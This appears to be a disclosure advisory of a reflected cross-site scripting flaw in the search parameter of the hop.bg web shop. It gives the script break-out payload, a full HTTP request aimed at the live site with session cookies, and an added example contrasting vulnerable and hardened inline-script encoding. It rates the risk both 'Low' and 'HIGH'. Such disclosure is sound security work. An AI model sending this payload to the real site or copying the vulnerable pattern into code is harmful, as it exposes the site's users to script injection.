Vulnerability title: hop.bg | web app | Reflected Cross-Site Scripting
Published: 2025.11.07
Submitted by: nu11secur1ty
Risk level: Low
Local exploit: No
Remote exploit: Yes
CVE: N/A
CWE: N/A
Basic information
- Title: hop.bg | web app | Reflected Cross-Site Scripting
- Author: nu11secur1ty
- Date: 3 November 2025
- Vendor: https://hop.bg/
- Software: https://hop.bg/
- Reference: https://portswigger.net/web-security/cross-site-scripting
Vulnerability description
The value of the srch request parameter is copied into a JavaScript string enclosed in single quotes. The payload lifmu</script><script>alert(1)</script>nkt8b was submitted in the srch parameter and is echoed unmodified in the application's response, without filtering or encoding. Because the HTML parser ends a script element at the first </script sequence regardless of JavaScript quoting, escaping the single quote alone would not prevent this break-out. The request below uses a second instance of the same payload with a different random prefix and suffix (gq7ns...in737). The site owner did not respond to the reported issue.
This proof of concept shows that arbitrary JavaScript can be injected into the application's response.
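The break-out described above, as an added example that is not part of the original advisory and not hop.bg code. It assumes a typical inline-script pattern (a variable named searchTerm) and takes only the payload from the advisory's request; the rendering functions and the tokenizer check are hypothetical. It shows why escaping the quote is not enough and one encoding that closes the hole.

```javascript
// Added example (not hop.bg code): a search term reflected into a
// single-quoted JavaScript string, vulnerable vs. hardened rendering.
// Payload copied from the advisory's request; the rest is assumed.

const PAYLOAD = "gq7ns</script><script>alert(1)</script>in737";

// Vulnerable pattern: the raw parameter is concatenated into an inline script.
// Backslashes and single quotes are escaped, which is the kind of partial
// filtering that still leaves the </script> break-out wide open.
function renderVulnerable(srch) {
  const quoted = srch.replace(/\\/g, "\\\\").replace(/'/g, "\\'");
  return `<script>var searchTerm = '${quoted}';</script>`;
}

// Hardened pattern: serialize with JSON.stringify, then escape the characters
// that can still end the script element or break the parse: '<', '>', '&'
// and the JavaScript line terminators U+2028 / U+2029. The result is still
// a valid JSON/JS string literal, so JSON.parse round-trips it.
function encodeForInlineScript(value) {
  return JSON.stringify(value)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderSafe(srch) {
  return `<script>var searchTerm = ${encodeForInlineScript(srch)};</script>`;
}

// Minimal model of the HTML tokenizer rule that matters here: inside a
// <script> element, the first case-insensitive "</script" ends the element,
// whatever the JavaScript quoting says. Returns true when the rendered
// markup contains an earlier "</script" than the legitimate closing tag,
// i.e. the reflected value has closed the element early.
function scriptElementEndsEarly(html) {
  const lower = html.toLowerCase();
  const open = lower.indexOf("<script>");
  if (open < 0) return false;
  const body = lower.slice(open + "<script>".length);
  const first = body.indexOf("</script");
  const last = body.lastIndexOf("</script");
  return first >= 0 && first !== last;
}

// Stand-alone demonstration.
console.log(renderVulnerable(PAYLOAD));
console.log("vulnerable ends early:", scriptElementEndsEarly(renderVulnerable(PAYLOAD)));
console.log(renderSafe(PAYLOAD));
console.log("hardened ends early:", scriptElementEndsEarly(renderSafe(PAYLOAD)));
```

The encoding in renderSafe is the usual fix for data placed inside inline script; output encoding for an HTML body or attribute context is different and must be chosen per context.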
Status: HIGH vulnerability
Payload:

GET /bg/tyrsene-123?p=123&l=1&srch=gq7ns%3c%2fscript%3e%3cscript%3ealert(1)%3c%2fscript%3ein737&submit_search= HTTP/1.1
Host: hop.bg
Cache-Control: max-age=0
Sec-CH-UA: "Chromium";v="141", "Not;A=Brand";v="24", "Google Chrome";v="141"
Sec-CH-UA-Mobile: ?0
Sec-CH-UA-Platform: "Windows"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: Public=3l4neblt0r1q8tl8r1j8vm1kg2; l=1; _gcl_au=1.1.1810943222.1761893757; _fbp=fb.1.1761893757009.110679894202803572; _tt_enable_cookie=1; _ttp=01K8WGTCHG0MT2MTV43EPDVPSH_.tt.1; _uetsid=a6fe2700b62611f0ba2e15757049e30e; _uetvid=a6fe6880b62611f0a84c27f8eba50d96; ttcsid=1761893757500::mkwLVMcL6Tixw1dD6Twz.1.1761893767648.0; ttcsid_D0S5A7RC77U1EAH3MNBG=1761893757499::8I3zM_RSsJeOcW0e8fgM.1.1761893767648.0
Upgrade-Insecure-Requests: 1
Referer: https://hop.bg/

Exploitation
Reproduction steps
Demo PoC
Time spent
01:27:00
System administrator - infrastructure engineer
Penetration testing engineer
Exploit developer at: https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
Home page: https://www.nu11secur1ty.com/ and https://www.asc3t1c-nu11secur1ty.com/
nu11secur1ty https://nu11secur1ty.blogspot.com/